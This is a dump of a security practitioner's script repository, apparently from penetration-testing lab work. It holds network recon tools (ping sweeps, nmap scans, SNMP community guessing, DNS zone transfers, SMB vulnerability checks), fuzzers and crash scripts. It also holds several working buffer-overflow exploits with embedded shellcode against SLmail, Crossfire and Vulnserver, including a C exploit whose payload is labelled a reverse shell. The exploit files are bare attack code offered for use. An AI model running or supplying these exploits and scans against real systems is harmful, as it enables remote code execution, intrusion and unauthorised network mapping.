├── Seba ├── staged_elf ├── non_staged_elf ├── embedded_payload_plink.exe ├── generate_report_nmap.sh ├── test_http_methods.sh ├── crashSlmail.py ├── measure_traffic_nmap_scan.sh ├── crash_crossfre.py ├── zone_transfer.sh ├── windows_machine_discover.sh ├── slmail_fuzzing.py ├── snmp_mib_discover.sh ├── discover-smb-vulnerabilities.sh ├── web_server_scraper_nmap.sh ├── exploit_crossfire.py ├── hex_position_in_buffer.py ├── nmapReport.sh ├── exploitSLmail.py ├── exploitSLmail_improved.py ├── pingSweep.py ├── exploit_vulnserver.py ├── parserHtml.py ├── 643_modified.c ├── 646_modified.c ├── linux_priv_esc_enum.sh └── ms12-037-2.html └── Fons ├── ping_sweep.sh └── ping_sweep.py /Seba/staged_elf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Phat3/Useful-Scripts/HEAD/Seba/staged_elf -------------------------------------------------------------------------------- /Seba/non_staged_elf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Phat3/Useful-Scripts/HEAD/Seba/non_staged_elf -------------------------------------------------------------------------------- /Seba/embedded_payload_plink.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Phat3/Useful-Scripts/HEAD/Seba/embedded_payload_plink.exe -------------------------------------------------------------------------------- /Seba/generate_report_nmap.sh: -------------------------------------------------------------------------------- 1 | echo 'making dir..' 2 | mkdir -p /root/Desktop/lab/$1/report 3 | echo 'do nmap scan...' 4 | nmap -A $1 -o /root/Desktop/lab/$1/report/nmap_general_report 5 | echo 'SUCCESS!' 6 | -------------------------------------------------------------------------------- /Fons/ping_sweep.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | for i in $(seq 10 11);do 3 | for j in $(seq 1 254); do 4 | ping -c 1 192.168.$i.$j | grep 'bytes from' | grep -Eo '[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+' & 5 | done 6 | done 7 | 8 | -------------------------------------------------------------------------------- /Seba/test_http_methods.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | for method in GET POST PUT TRACE CONNECT OPTIONS PROPFIND; do 4 | printf "$method " ; 5 | printf "$method / HTTP/1.1\nContent-Length: 7000\nHost: $1\n\n" | nc -q 1 $1 80 | grep "HTTP/1.1" 6 | 7 | done 8 | -------------------------------------------------------------------------------- /Seba/crashSlmail.py: -------------------------------------------------------------------------------- 1 | import socket 2 | 3 | buffer = 'A'*2700 4 | 5 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 6 | print('connecting....') 7 | s.connect(('192.168.31.154', 110)) 8 | s.recv(1024) 9 | s.send('USER test\r\n') 10 | s.recv(1024) 11 | print 'send password...' 12 | s.send('PASS ' + buffer + '\r\n') 13 | s.recv(1024) 14 | print 'CRASH!' 15 | -------------------------------------------------------------------------------- /Seba/measure_traffic_nmap_scan.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | #reset iptables rules and add our two new rules to measure the output and the input traffic 4 | iptables -I INPUT 1 -s 192.168.31.227 -j ACCEPT 5 | iptables -I OUTPUT 1 -d 192.168.31.227 -j ACCEPT 6 | iptables -Z 7 | #et's do a complete scan with nmap on the monitored host 8 | nmap -A 192.168.31.227 9 | #show results 10 | iptables -vn -L 11 | -------------------------------------------------------------------------------- /Seba/crash_crossfre.py: -------------------------------------------------------------------------------- 1 | import socket 2 | 3 | host = '127.0.0.1' 4 | port = 13327 5 | 6 | payload = "A"*4368 + "B"*4 +"C"*7 7 | 8 | buffer = "\x11(setup sound " + payload + "\x90\x00#" 9 | 10 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 11 | print 'connecting...' 12 | s.connect((host, port)) 13 | print s.recv(1024) 14 | print 'sending buffer...' 15 | s.send(buffer) 16 | print s.recv(1024) 17 | s.close() 18 | print 'CRASH!' 19 | -------------------------------------------------------------------------------- /Seba/zone_transfer.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | #check if the number of parameters is greater than 0 4 | if [ $# -eq 0 -o $# -gt 1 ]; then 5 | echo 'insert only one parameter (the domain name)' 6 | exit 0 7 | else 8 | #get all name server for the given domain 9 | for ns in $(host -t ns $1 | cut -d " " -f4); do 10 | #try a zone transfer on each name server 11 | host -l $1 $ns | grep "has address"| cut -d " " -f 1,4 12 | done 13 | fi 14 | 15 | 16 | 17 | -------------------------------------------------------------------------------- /Seba/windows_machine_discover.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | rm $HOME/Desktop/fileUtili/windows_machine > /dev/null 4 | 5 | echo 'ping sweep...' 6 | nmap -sn 192.168.31.220-254 -oG out > /dev/null 7 | 8 | for ip in $(cat out | grep Host | cut -d " " -f2); do 9 | echo "analyzing ${ip}..." 10 | if [ ! $(nmap -O $ip | grep Windows | wc -l ) -eq 0 ]; then 11 | echo $ip >> $HOME/Desktop/fileUtili/windows_machine; 12 | echo "${ip} added"; 13 | fi 14 | done 15 | rm out 16 | -------------------------------------------------------------------------------- /Seba/slmail_fuzzing.py: -------------------------------------------------------------------------------- 1 | import socket 2 | 3 | buffer = ["A"] 4 | counter = 100 5 | 6 | while len(buffer) <= 30: 7 | buffer.append("A"*counter) 8 | counter = counter + 200 9 | 10 | for string in buffer: 11 | print "Fuzzing PASS with " + str(len(string)) + " bytes" 12 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 13 | connect = s.connect(('192.168.31.154', 110)) 14 | s.recv(1024) 15 | s.send('USER test\r\n') 16 | s.recv(1024) 17 | s.send('PASS ' + string + '\r\n') 18 | s.send('QUIT\r\n') 19 | s.close() 20 | 21 | -------------------------------------------------------------------------------- /Fons/ping_sweep.py: -------------------------------------------------------------------------------- 1 | from netaddr import IPNetwork 2 | import subprocess 3 | import re 4 | 5 | network = '192.168.10.0/23' 6 | processes = [] 7 | for ip in IPNetwork(network): 8 | proc = subprocess.Popen('ping -c 1 '+str(ip)+' &',shell = True ,stdout = subprocess.PIPE) 9 | processes.append(proc) 10 | 11 | for p in processes: 12 | p.wait() 13 | 14 | for proc in processes: 15 | output,error = proc.communicate() 16 | if re.search('bytes from', output): 17 | match = re.search('[0-9]*\.[0-9]*\.[0-9]*\.[0-9]*', output) 18 | print match.group(0) 19 | 20 | 21 | -------------------------------------------------------------------------------- /Seba/snmp_mib_discover.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | rm report > /dev/null 4 | 5 | for ip in $(seq 220 254); do 6 | echo 192.168.31.$ip >> ip_list.tmp 7 | done; 8 | 9 | echo public >> words_list.tmp 10 | echo private >> words_list.tmp 11 | echo manager >> words_list.tmp 12 | 13 | onesixtyone -c words_list.tmp -i ip_list.tmp -o report 14 | 15 | rm ip_list.tmp > /dev/null 16 | rm words_list.tmp > /dev/null 17 | 18 | for ip in $(cat report | cut -d " " -f1); do 19 | echo "analyzing ${ip}...." 20 | snmpwalk -c public -v1 $ip >> $ip-report-snmtp 21 | done 22 | 23 | rm report 24 | echo 'SUCCESS!, you will find your reports in the current directory' 25 | -------------------------------------------------------------------------------- /Seba/discover-smb-vulnerabilities.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | rm windows-smb-vuln-report.txt > /dev/null 4 | 5 | 6 | #scan my ip range to find wich machines have te SMB protocol active 7 | nmap -v -p 445,139 192.168.31.220-254 -oG output.tmp 8 | 9 | #for each ip check if smb-os-discovery script return windows as OS 10 | for ip in $(cat output.tmp | grep open | cut -d " " -f 2 ); do 11 | if [ ! $(nmap --script=smb-os-discovery $ip | grep Windows | wc -l ) -eq 0 ]; then 12 | echo "${ip} machine has windows whith SMB protocol" 13 | echo 'checking for vulnerabilities...' 14 | nmap --script=smb-check-vulns.nse --script-args=unsafe=1 $ip >> windows-smb-vuln-report.txt 15 | fi 16 | done 17 | 18 | rm output.tmp 19 | -------------------------------------------------------------------------------- /Seba/web_server_scraper_nmap.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | rm web-server.txt > /dev/null 4 | 5 | echo 'executing ping sweep...' 6 | 7 | nmap -sn 192.168.31.220-254 -oG output.txt > /dev/null 8 | 9 | echo 'done' 10 | echo 'executing web-server port scan...' 11 | 12 | for ip in $(cat output.txt | grep "Host" | cut -d " " -f2); do 13 | nmap -p 80 $ip -oG web-server.txt > /dev/null 14 | # build a file concatenatng all the results 15 | cat web-server.txt >> web-server-not-formatted.txt 16 | rm web-server.txt 17 | done 18 | 19 | #let's clean the output 20 | cat web-server-not-formatted.txt | grep open | cut -d " " -f2 > web-server.txt 21 | 22 | rm output.txt > /dev/null 23 | rm web-server-not-formatted.txt > /dev/null 24 | 25 | echo 'SUCCESS!, You will find your report in the file callend "web-server.txt" in the current directory' 26 | -------------------------------------------------------------------------------- /Seba/exploit_crossfire.py: -------------------------------------------------------------------------------- 1 | import socket 2 | 3 | host = '127.0.0.1' 4 | port = 13327 5 | 6 | shellcode = ("\xd9\xc9\xd9\x74\x24\xf4\xbe\xc3\x9c\x90\x59\x5f\x2b\xc9" + 7 | "\xb1\x14\x31\x77\x19\x83\xc7\x04\x03\x77\x15\x21\x69\xa1" + 8 | "\x82\x52\x71\x91\x77\xcf\x1c\x14\xf1\x0e\x50\x7e\xcc\x50" + 9 | "\xca\x21\x9c\x38\xef\xdd\x31\xe4\x85\xcd\x60\x44\xd3\x0f" + 10 | "\xe8\x02\xbb\x02\x6d\x43\x7a\x99\xdd\x57\xcd\xc7\xec\xd7" + 11 | "\x6e\xb8\x89\x1a\xf0\x2b\x0c\xce\xce\x13\x62\x8e\x78\xdd" + 12 | "\x84\xe6\x55\x32\x06\x9e\xc1\x63\x8a\x37\x7c\xf5\xa9\x97" + 13 | "\xd3\x8c\xcf\xa7\xdf\x43\x8f") 14 | 15 | payload = shellcode + "\x90"*(4368 - len(shellcode)) + "\x97\x45\x13\x08" + "\x83\xc0\x0c\xff\xe0" + "\x90\x90" 16 | 17 | buffer = "\x11(setup sound " + payload + "\x90\x00#" 18 | 19 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 20 | print 'connecting...' 21 | s.connect((host, port)) 22 | print s.recv(1024) 23 | print 'sending buffer...' 24 | s.send(buffer) 25 | print s.recv(1024) 26 | s.close() 27 | print 'CRASH!' 28 | 29 | -------------------------------------------------------------------------------- /Seba/hex_position_in_buffer.py: -------------------------------------------------------------------------------- 1 | import subprocess 2 | #old buffer 3 | bufferLength = raw_input('Enter the length of the buffer you want modify: ') 4 | #which pattern i have to find 5 | pattern = raw_input('Enter the hex pattern in reverse order: ') 6 | #create the patthern 7 | p = subprocess.Popen(['/usr/share/metasploit-framework/tools/pattern_create.rb', bufferLength], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) 8 | buffer, err = p.communicate() 9 | #encode in hex the buffer 10 | hexbuffer = buffer.strip().encode('hex') 11 | #find our patter in reverse order (little endian) 12 | position = hexbuffer.find(pattern) 13 | if(position == -1): 14 | print 'Pattern not found' 15 | else: 16 | #get the substring matched and decode it as hex 17 | substrigBuffer = hexbuffer[position : position + 8].decode('hex') 18 | #get the position of the pattern in string format in old buffer 19 | position = buffer.find(substrigBuffer) 20 | #print the formula for the new buffer 21 | print '"A"*' + str(position) + ' + "B"*4 +"C"*' + str((len(buffer.strip()) - 4 - position)) 22 | 23 | -------------------------------------------------------------------------------- /Seba/nmapReport.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | #script that performs a nmap scan only on the up ip addresses on the private network 3 | 4 | #let's do a ping sweep over the entire network range 5 | #array to trace the pids of the ping subprocess 6 | declare -a pidPing=() 7 | declare -a pidNmap=() 8 | 9 | 10 | mkdir $HOME/Desktop/reportNmap; 11 | rm $HOME/Desktop/reportNmap/nmapReport.txt; 12 | 13 | 14 | #let's check our range of ip adresses 15 | for j in $( seq 200 255 ); do 16 | #execute the ping only one time for each ip and get the ip address of the up machines 17 | ping -c 1 192.168.31.$j | grep "bytes from" | cut -d " " -f 4 | cut -d ":" -f 1 | sort -u >> $HOME/Desktop/reportNmap/upIPTmp.txt & 18 | echo "ping of 192.168.31.${ip}" 19 | #save the pid of ping 20 | pidPing=(${pidPing[@]} $!) 21 | done 22 | 23 | #wait for all pid in the array 24 | for pidtowait in ${pidPing[@]}; do 25 | wait $pidtowait 26 | echo "pid # ${pidtowait} finished" 27 | done 28 | 29 | #remove duplicates 30 | cat $HOME/Desktop/reportNmap/upIPTmp.txt | sort -u > $HOME/Desktop/reportNmap/upIP.txt 31 | 32 | #let's do an nmap command over the previuous ip list 33 | for ip in $(cat $HOME/Desktop/reportNmap/upIP.txt); do 34 | nmap $ip >> $HOME/Desktop/reportNmap/nmapReport.txt 35 | echo "nmap of ${ip}" 36 | done 37 | 38 | #remove useless file 39 | rm $HOME/Desktop/reportNmap/upIPTmp.txt 40 | rm $HOME/Desktop/reportNmap/upIP.txt 41 | 42 | echo 'SUCCESS!!, you will find your report in $HOME/Desktop/reportNmap/nmapReport.txt' 43 | -------------------------------------------------------------------------------- /Seba/exploitSLmail.py: -------------------------------------------------------------------------------- 1 | import socket 2 | 3 | buf =("\xdd\xc5\xbb\xc8\xcf\x42\xd7\xd9\x74\x24\xf4\x5a\x2b\xc9" + 4 | "\xb1\x4f\x83\xc2\x04\x31\x5a\x15\x03\x5a\x15\x2a\x3a\xbe" + 5 | "\x3f\x23\xc5\x3f\xc0\x53\x4f\xda\xf1\x41\x2b\xae\xa0\x55" + 6 | "\x3f\xe2\x48\x1e\x6d\x17\xda\x52\xba\x18\x6b\xd8\x9c\x17" + 7 | "\x6c\xed\x20\xfb\xae\x6c\xdd\x06\xe3\x4e\xdc\xc8\xf6\x8f" + 8 | "\x19\x34\xf8\xdd\xf2\x32\xab\xf1\x77\x06\x70\xf0\x57\x0c" + 9 | "\xc8\x8a\xd2\xd3\xbd\x20\xdc\x03\x6d\x3f\x96\xbb\x05\x67" + 10 | "\x07\xbd\xca\x74\x7b\xf4\x67\x4e\x0f\x07\xae\x9f\xf0\x39" + 11 | "\x8e\x73\xcf\xf5\x03\x8a\x17\x31\xfc\xf9\x63\x41\x81\xf9" + 12 | "\xb7\x3b\x5d\x8c\x25\x9b\x16\x36\x8e\x1d\xfa\xa0\x45\x11" + 13 | "\xb7\xa7\x02\x36\x46\x64\x39\x42\xc3\x8b\xee\xc2\x97\xaf" + 14 | "\x2a\x8e\x4c\xce\x6b\x6a\x22\xef\x6c\xd2\x9b\x55\xe6\xf1" + 15 | "\xc8\xef\xa5\x9d\x3d\xdd\x55\x5e\x2a\x56\x25\x6c\xf5\xcc" + 16 | "\xa1\xdc\x7e\xca\x36\x22\x55\xaa\xa9\xdd\x56\xca\xe0\x19" + 17 | "\x02\x9a\x9a\x88\x2b\x71\x5b\x34\xfe\xd5\x0b\x9a\x51\x95" + 18 | "\xfb\x5a\x02\x7d\x16\x55\x7d\x9d\x19\xbf\x08\x9a\x8e\x80" + 19 | "\xa3\x3a\xd8\x69\xb6\x42\xc0\xfd\x3f\xa4\x66\xee\x69\x7f" + 20 | "\x1f\x97\x33\x0b\xbe\x58\xee\x9b\x23\xca\x75\x5b\x2d\xf7" + 21 | "\x21\x0c\x7a\xc9\x3b\xd8\x96\x70\x92\xfe\x6a\xe4\xdd\xba" + 22 | "\xb0\xd5\xe0\x43\x34\x61\xc7\x53\x80\x6a\x43\x07\x5c\x3d" + 23 | "\x1d\xf1\x1a\x97\xef\xab\xf4\x44\xa6\x3b\x80\xa6\x79\x3d" + 24 | "\x8d\xe2\x0f\xa1\x3c\x5b\x56\xde\xf1\x0b\x5e\xa7\xef\xab" + 25 | "\xa1\x72\xb4\xdc\xeb\xde\x9d\x74\xb2\x8b\x9f\x18\x45\x66" + 26 | "\xe3\x24\xc6\x82\x9c\xd2\xd6\xe7\x99\x9f\x50\x14\xd0\xb0" + 27 | "\x34\x1a\x47\xb0\x1c") 28 | 29 | buffer = 'A'*2606 + "\x8f\x35\x4a\x5f" + "\x90"*8 + buf 30 | 31 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 32 | print('connecting....') 33 | s.connect(('192.168.31.154', 110)) 34 | s.recv(1024) 35 | s.send('USER test\r\n') 36 | s.recv(1024) 37 | print 'send password...' 38 | s.send('PASS ' + buffer + '\r\n') 39 | s.recv(1024) 40 | print 'SUCCESS!' 41 | -------------------------------------------------------------------------------- /Seba/exploitSLmail_improved.py: -------------------------------------------------------------------------------- 1 | import socket 2 | 3 | buf =("\xb8\xe6\x01\x8e\xd3\xda\xce\xd9\x74\x24\xf4\x5a\x29\xc9" + 4 | "\xb1\x4f\x31\x42\x14\x03\x42\x14\x83\xc2\x04\x04\xf4\x72" + 5 | "\x3b\x41\xf7\x8a\xbc\x31\x71\x6f\x8d\x63\xe5\xfb\xbc\xb3" + 6 | "\x6d\xa9\x4c\x38\x23\x5a\xc6\x4c\xec\x6d\x6f\xfa\xca\x40" + 7 | "\x70\xcb\xd2\x0f\xb2\x4a\xaf\x4d\xe7\xac\x8e\x9d\xfa\xad" + 8 | "\xd7\xc0\xf5\xff\x80\x8f\xa4\xef\xa5\xd2\x74\x0e\x6a\x59" + 9 | "\xc4\x68\x0f\x9e\xb1\xc2\x0e\xcf\x6a\x59\x58\xf7\x01\x05" + 10 | "\x79\x06\xc5\x56\x45\x41\x62\xac\x3d\x50\xa2\xfd\xbe\x62" + 11 | "\x8a\x51\x81\x4a\x07\xa8\xc5\x6d\xf8\xdf\x3d\x8e\x85\xe7" + 12 | "\x85\xec\x51\x62\x18\x56\x11\xd4\xf8\x66\xf6\x82\x8b\x65" + 13 | "\xb3\xc1\xd4\x69\x42\x06\x6f\x95\xcf\xa9\xa0\x1f\x8b\x8d" + 14 | "\x64\x7b\x4f\xac\x3d\x21\x3e\xd1\x5e\x8d\x9f\x77\x14\x3c" + 15 | "\xcb\x01\x77\x29\x38\x3f\x88\xa9\x56\x48\xfb\x9b\xf9\xe2" + 16 | "\x93\x97\x72\x2c\x63\xd7\xa8\x88\xfb\x26\x53\xe8\xd2\xec" + 17 | "\x07\xb8\x4c\xc4\x27\x53\x8d\xe9\xfd\xf3\xdd\x45\xae\xb3" + 18 | "\x8d\x25\x1e\x5b\xc4\xa9\x41\x7b\xe7\x63\xf4\xbc\x70\x4c" + 19 | "\xaf\x5c\x16\x24\xb2\x60\x3e\x21\x3b\x86\x54\x59\x6a\x11" + 20 | "\xc1\xc0\x37\xe9\x70\x0c\xe2\x79\x10\x9f\x69\x79\x5f\xbc" + 21 | "\x25\x2e\x08\x72\x3c\xba\xa4\x2d\x96\xd8\x34\xab\xd1\x58" + 22 | "\xe3\x08\xdf\x61\x66\x34\xfb\x71\xbe\xb5\x47\x25\x6e\xe0" + 23 | "\x11\x93\xc8\x5a\xd0\x4d\x83\x31\xba\x19\x52\x7a\x7d\x5f" + 24 | "\x5b\x57\x0b\xbf\xea\x0e\x4a\xc0\xc3\xc6\x5a\xb9\x39\x77" + 25 | "\xa4\x10\xfa\x97\x47\xb0\xf7\x3f\xde\x51\xba\x5d\xe1\x8c" + 26 | "\xf9\x5b\x62\x24\x82\x9f\x7a\x4d\x87\xe4\x3c\xbe\xf5\x75" + 27 | "\xa9\xc0\xaa\x76\xf8") 28 | 29 | buffer = 'A'*2606 + "\x8f\x35\x4a\x5f" + "\x90"*8 + buf 30 | 31 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 32 | print('connecting....') 33 | s.connect(('192.168.31.154', 110)) 34 | s.recv(1024) 35 | s.send('USER test\r\n') 36 | s.recv(1024) 37 | print 'send password...' 38 | s.send('PASS ' + buffer + '\r\n') 39 | s.recv(1024) 40 | s.close() 41 | print 'SUCCESS!' 42 | -------------------------------------------------------------------------------- /Seba/pingSweep.py: -------------------------------------------------------------------------------- 1 | import subprocess, os 2 | #TODO da renderlo flessibile dal punto di vista della netmask(capire la lungezza della netmask e pingare tutti gli indrizzi posibili con quella netmask) 3 | subnetMask = '255.255.254.0.0' 4 | #TODO rendere possibile inserimento start e end da parte dell utente e fare in modo che funzioni con altre netmasck diverse dalla 24 5 | startAddress = '192.168.31.200' 6 | endAddress = '192.168.31.254' 7 | 8 | ''' 9 | da implementare la flessibilita della netmask (ora non c e tempo) 10 | conversion = '' 11 | for part in subnetMask.split('.'): 12 | binary = bin(int(part)).split("0b") 13 | conversion = conversion + binary[1] 14 | print conversion.count("1") 15 | ''' 16 | #prendiamo l'ultima parte degli indirizzi 17 | start = int(startAddress.split(".")[3]) 18 | end = int(endAddress.split(".")[3]) 19 | #inizializziamo l array dei network che rispondono al ping 20 | responseNetwork = [] 21 | count = 0 22 | 23 | #scorriamo tutti gli indirizzi nel range e pinghiamo la macchina 24 | for x in xrange(start,end): 25 | address = '192.168.31.' + str(x) 26 | process = subprocess.Popen('ping -c 1 ' + address, shell = True, stdout=subprocess.PIPE) 27 | out, err = process.communicate() 28 | count = count +1 29 | print 'Controllati ' + str(count) + ' Indirizzi' 30 | #se non ho questa frase (il count e > 0) allora la macchina ha risposto 31 | if (out.count("Destination Host Unreachable") == 0): 32 | print 'Indirizzo aggiunto' 33 | responseNetwork.append(address) 34 | 35 | #ricaviamo la directory dove vogliamo salvare i file partendo dalla home dell utente 36 | directory = os.path.expanduser('~') + '/Desktop/fileUtili' 37 | #se non esiste la directory creiamola e apriamo il file 38 | if (os.path.isdir(directory)): 39 | fileOutput = open(directory + '/indirizziAttivi.txt', 'w') 40 | else: 41 | os.makedirs(directory) 42 | fileOutput = open(directory + '/indirizziAttivi.txt', 'w') 43 | #scriviamo il file 44 | for addr in responseNetwork: 45 | fileOutput.write(addr + "\n") 46 | 47 | print 'SUCCESS!' 48 | -------------------------------------------------------------------------------- /Seba/exploit_vulnserver.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import time, struct 3 | import socket as so 4 | 5 | server = '192.168.31.154' 6 | port = 5555 7 | 8 | buf =("\xba\x31\x9f\xfd\xec\xdd\xc2\xd9\x74\x24\xf4\x5f\x33\xc9" + 9 | "\xb1\x4f\x83\xc7\x04\x31\x57\x10\x03\x57\x10\xd3\x6a\x01" + 10 | "\x04\x9a\x95\xfa\xd5\xfc\x1c\x1f\xe4\x2e\x7a\x6b\x55\xfe" + 11 | "\x08\x39\x56\x75\x5c\xaa\xed\xfb\x49\xdd\x46\xb1\xaf\xd0" + 12 | "\x57\x74\x70\xbe\x94\x17\x0c\xbd\xc8\xf7\x2d\x0e\x1d\xf6" + 13 | "\x6a\x73\xee\xaa\x23\xff\x5d\x5a\x47\xbd\x5d\x5b\x87\xc9" + 14 | "\xde\x23\xa2\x0e\xaa\x99\xad\x5e\x03\x96\xe6\x46\x2f\xf0" + 15 | "\xd6\x77\xfc\xe3\x2b\x31\x89\xd7\xd8\xc0\x5b\x26\x20\xf3" + 16 | "\xa3\xe4\x1f\x3b\x2e\xf5\x58\xfc\xd1\x80\x92\xfe\x6c\x92" + 17 | "\x60\x7c\xab\x17\x75\x26\x38\x8f\x5d\xd6\xed\x49\x15\xd4" + 18 | "\x5a\x1e\x71\xf9\x5d\xf3\x09\x05\xd5\xf2\xdd\x8f\xad\xd0" + 19 | "\xf9\xd4\x76\x79\x5b\xb1\xd9\x86\xbb\x1d\x85\x22\xb7\x8c" + 20 | "\xd2\x54\x9a\xd8\x17\x6a\x25\x19\x30\xfd\x56\x2b\x9f\x55" + 21 | "\xf1\x07\x68\x73\x06\x67\x43\xc3\x98\x96\x6c\x33\xb0\x5c" + 22 | "\x38\x63\xaa\x75\x41\xe8\x2a\x79\x94\xbe\x7a\xd5\x47\x7e" + 23 | "\x2b\x95\x37\x16\x21\x1a\x67\x06\x4a\xf0\x1e\x01\xdd\x3b" + 24 | "\x88\x93\x89\xd4\xcb\xab\x93\xb0\x45\x4d\xb1\xa8\x03\xc6" + 25 | "\x2e\x50\x0e\x9c\xcf\x9d\x84\x34\x73\x0f\x43\xc4\xfa\x2c" + 26 | "\xdc\x93\xab\x83\x15\x71\x46\xbd\x8f\x67\x9b\x5b\xf7\x23" + 27 | "\x40\x98\xf6\xaa\x05\xa4\xdc\xbc\xd3\x25\x59\xe8\x8b\x73" + 28 | "\x37\x46\x6a\x2a\xf9\x30\x24\x81\x53\xd4\xb1\xe9\x63\xa2" + 29 | "\xbd\x27\x12\x4a\x0f\x9e\x63\x75\xa0\x76\x64\x0e\xdc\xe6" + 30 | "\x8b\xc5\x64\x06\x6e\xcf\x90\xaf\x37\x9a\x18\xb2\xc7\x71" + 31 | "\x5e\xcb\x4b\x73\x1f\x28\x53\xf6\x1a\x74\xd3\xeb\x56\xe5" + 32 | "\xb6\x0b\xc4\x06\x93") 33 | 34 | #find JMP ESP operation at 65D11D71 35 | req1 = "AUTH " +"A"*1040 + "\x71\x1d\xd1\x65" + "\x90"*16 + buf 36 | s = so.socket(so.AF_INET, so.SOCK_STREAM) 37 | try: 38 | s.connect((server, port)) 39 | print repr(s.recv(1024)) 40 | s.send(req1) 41 | print repr(s.recv(1024)) 42 | except: 43 | print "[!] connection refused, check debugger" 44 | s.close() 45 | -------------------------------------------------------------------------------- /Seba/parserHtml.py: -------------------------------------------------------------------------------- 1 | import urllib2, sys, getopt, re 2 | from subprocess import call 3 | 4 | def main(argv): 5 | #variabili per tenere traccia delle opzioni inserite 6 | #dominio su cui effettuare la ricerca 7 | url = '' 8 | #parolachiave su cui cosruire la regex 9 | key = '' 10 | #ricaviamo le opzioni inserite 11 | try: 12 | opts, argrs = getopt.getopt(argv, 'hu:k:', '[help, url, key]') 13 | #se non metto tutte le opzioni visualizza l'helper(non funzionante) 14 | except getopt.GetoptError: 15 | print 'usage : parserHtml.py -u -k ' 16 | sys.exit(2) 17 | for opt, arg in opts: 18 | if opt in ('-h', '--help'): 19 | print 'usage : parserHtml.py -u -k ' 20 | sys.exit() 21 | elif opt in ('-u', '--url'): 22 | url = arg 23 | elif opt in ('-k', '--key'): 24 | key = arg 25 | #scarichiamo la pagina da analizzare 26 | response = urllib2.urlopen('http://' + url) 27 | html = response.read() 28 | #ricaviamo i link all interno della pagina 29 | regexp = buildRegex(key) 30 | links = regexp.finditer(html) 31 | #costruiamo la lista giusta senza doppioni 32 | linkWithoutDuplicates = buildLinkList(links) 33 | doHostCommand(linkWithoutDuplicates) 34 | 35 | 36 | #Funzione che restitutisce la regexp corretta ricavandola dalla key immessa 37 | def buildRegex(key): 38 | #inizimo dalla regex di base 39 | regex = "http://[^\"]*.*" 40 | #splittiamo sul punto cosi da poter fare l escape con il \ (nelle regex il . equivale al match di qualsiasi carattere se non ha lescape) 41 | parts = key.split(".") 42 | #per ogni segmento 43 | for index, value in enumerate(parts): 44 | #se e l ultimo non mettto il punto con escape 45 | if index == (len(parts) - 1): 46 | regex = regex + value 47 | #a tutti gli altri segmenti ncodo il punto con escape 48 | else: 49 | regex = regex + value + "\." 50 | #aggiungiamo la parte finale 51 | regex = regex + ".*" 52 | return re.compile(r'' + regex) 53 | 54 | def buildLinkList(links): 55 | #iniziamo a costruire la lista 56 | linkList = [] 57 | #ricaviamo la parte di link interessante depurando lla stringa da parti non volute 58 | for link in links: 59 | linkPart = link.group().split("/") 60 | #ci interessano solo i sottodomini in questo caso 61 | linkCorrect = linkPart[2] 62 | linkList.append(linkCorrect) 63 | #togliamo i doppioni dalla lista 64 | linkWithoutDuplicates = set(linkList) 65 | #stampiamo la lista definitiva 66 | return linkWithoutDuplicates 67 | 68 | def doHostCommand(linkList): 69 | for link in linkList: 70 | command = 'host ' + link 71 | a = call(command, shell=True) 72 | 73 | 74 | if __name__ == "__main__": 75 | main(sys.argv[1:]) 76 | -------------------------------------------------------------------------------- /Seba/643_modified.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | 12 | #define RETADD "\x8f\x35\x4a\x5f" 13 | #define PORT 110 14 | 15 | /* revshell ?????? ???????? ????????*/ 16 | char shellcode[] = 17 | "\xb8\xe6\x01\x8e\xd3\xda\xce\xd9\x74\x24\xf4\x5a\x29\xc9" 18 | "\xb1\x4f\x31\x42\x14\x03\x42\x14\x83\xc2\x04\x04\xf4\x72" 19 | "\x3b\x41\xf7\x8a\xbc\x31\x71\x6f\x8d\x63\xe5\xfb\xbc\xb3" 20 | "\x6d\xa9\x4c\x38\x23\x5a\xc6\x4c\xec\x6d\x6f\xfa\xca\x40" 21 | "\x70\xcb\xd2\x0f\xb2\x4a\xaf\x4d\xe7\xac\x8e\x9d\xfa\xad" 22 | "\xd7\xc0\xf5\xff\x80\x8f\xa4\xef\xa5\xd2\x74\x0e\x6a\x59" 23 | "\xc4\x68\x0f\x9e\xb1\xc2\x0e\xcf\x6a\x59\x58\xf7\x01\x05" 24 | "\x79\x06\xc5\x56\x45\x41\x62\xac\x3d\x50\xa2\xfd\xbe\x62" 25 | "\x8a\x51\x81\x4a\x07\xa8\xc5\x6d\xf8\xdf\x3d\x8e\x85\xe7" 26 | "\x85\xec\x51\x62\x18\x56\x11\xd4\xf8\x66\xf6\x82\x8b\x65" 27 | "\xb3\xc1\xd4\x69\x42\x06\x6f\x95\xcf\xa9\xa0\x1f\x8b\x8d" 28 | "\x64\x7b\x4f\xac\x3d\x21\x3e\xd1\x5e\x8d\x9f\x77\x14\x3c" 29 | "\xcb\x01\x77\x29\x38\x3f\x88\xa9\x56\x48\xfb\x9b\xf9\xe2" 30 | "\x93\x97\x72\x2c\x63\xd7\xa8\x88\xfb\x26\x53\xe8\xd2\xec" 31 | "\x07\xb8\x4c\xc4\x27\x53\x8d\xe9\xfd\xf3\xdd\x45\xae\xb3" 32 | "\x8d\x25\x1e\x5b\xc4\xa9\x41\x7b\xe7\x63\xf4\xbc\x70\x4c" 33 | 